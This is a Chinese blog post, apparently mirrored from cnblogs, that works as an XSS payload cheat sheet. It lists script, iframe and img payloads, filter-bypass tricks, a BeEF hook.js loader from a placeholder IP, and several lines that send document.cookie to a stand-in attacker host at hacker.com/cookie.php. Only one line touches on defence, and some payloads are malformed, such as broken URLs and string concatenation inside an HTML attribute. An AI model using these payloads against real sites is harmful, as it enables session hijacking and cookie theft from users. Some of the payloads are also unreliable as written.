zoukankan      html  css  js  c++  java
  • XSS攻击

    1.对输入的<>/进行处理后,可预防xss攻击

      反射型xss: 一般是查询输入框中招,将代有木马参数的url发送给某用户,用户点击后即中招

      存储型xss:输入并存储在页面,一般如留言框中招;

           domxss:在URL的哈西值部分(即URL#号后的部分)植入xss攻击

    2.在输入框中输入:

      <script> alert(‘xss’)</script>

      出现弹框,显示xss,说明存在xss攻击漏洞,可以进行xss攻击

    3.弹框形势有:

      <script> alert(‘xss’)</script>

      <script> alert(document.cookie)</script>

      其中document.cookie可以获取当前浏览器的cookie

    4.页面嵌套:

      <iframe src=http://www.baidu.com width=300 height=300></iframe>

      <iframe src=http://www.baidu.com width=0 height=0></iframe>   :这个比上一个更隐蔽,引文边框为0.不易察觉

    5.页面重定向:

      <script> window.location="http://www/baidu.com"</script>

      <script> location.href="http://www/baidu.com"</script>

    6.弹框警告并重定向:

      <script> alert(‘请移步到我们的新站’);location.href="http://www/baidu.com"</script>

      <script> alert(‘xss’);location.href="http://www/baidu.com/robots.txt"</script>

    7.访问恶意代码:

      <script src="http://BeFF_IP:3000/hook.js"></script>      :结合BeFFS收集用户的信息

    8.巧用图片标签

      <img src="#" onerror=alert("xss")>    :#不是有效的图片资源,导致图片加载失败,进而触发了oneerror事件,弹出alert弹框,触发CSS攻击

      <img src=“javaScript:alert('xss');">

      <img src="http://BeFF_IP:3000/hook.js"></img>

    9.绕开过滤的脚本:

      大小写 <ScrIpt> alert(‘xss’)</SCRipt>

      字符编码 采用url、Base64等编码 <a href="经过编码后的url"></a>

    10.收集用户cookie

      打开新窗口并且采用本地cookie访问目标网,打开心窗口并且采用本地cookie访问目标网页。

        <script> window.open("http://www/hacker.com/cookie.php?cookie="+document.cookie)</script>

        <script> window.location="http://www/hacker.com/cookie.php?cookie="+document.cookie</script>

        <script> new Image().src="http://www/hacker.com/cookie.php?cookie="+document.cookie;</script>

        <img src="http://www/hacker.com/cookie.php?cookie="+document.cookie></img>

        <iframe src="http://www/hacker.com/cookie.php?cookie="+document.cookie ></iframe>

        <script>new Image().src="http://www/hacker.com/cookie.php?cookie="+document.cookie;

        img.width = 0;

        img.height = 0;

        </script>

    11.BeFF xss自动化攻击

      

  • 相关阅读:
    云原生技术实践,起步k8s
    线程,同步构造
    线程,限制的异步操作
    DotNet Core管道通信
    打下设计模式
    739--Daily Temperatures
    1021--RemoveOutermostParentheses
    Java并行程序基础。
    155--MinStack
    1047--Remove All Adjacent Duplicates In String
  • 原文地址:https://www.cnblogs.com/jingzaixin/p/12372991.html
Copyright © 2011-2022 走看看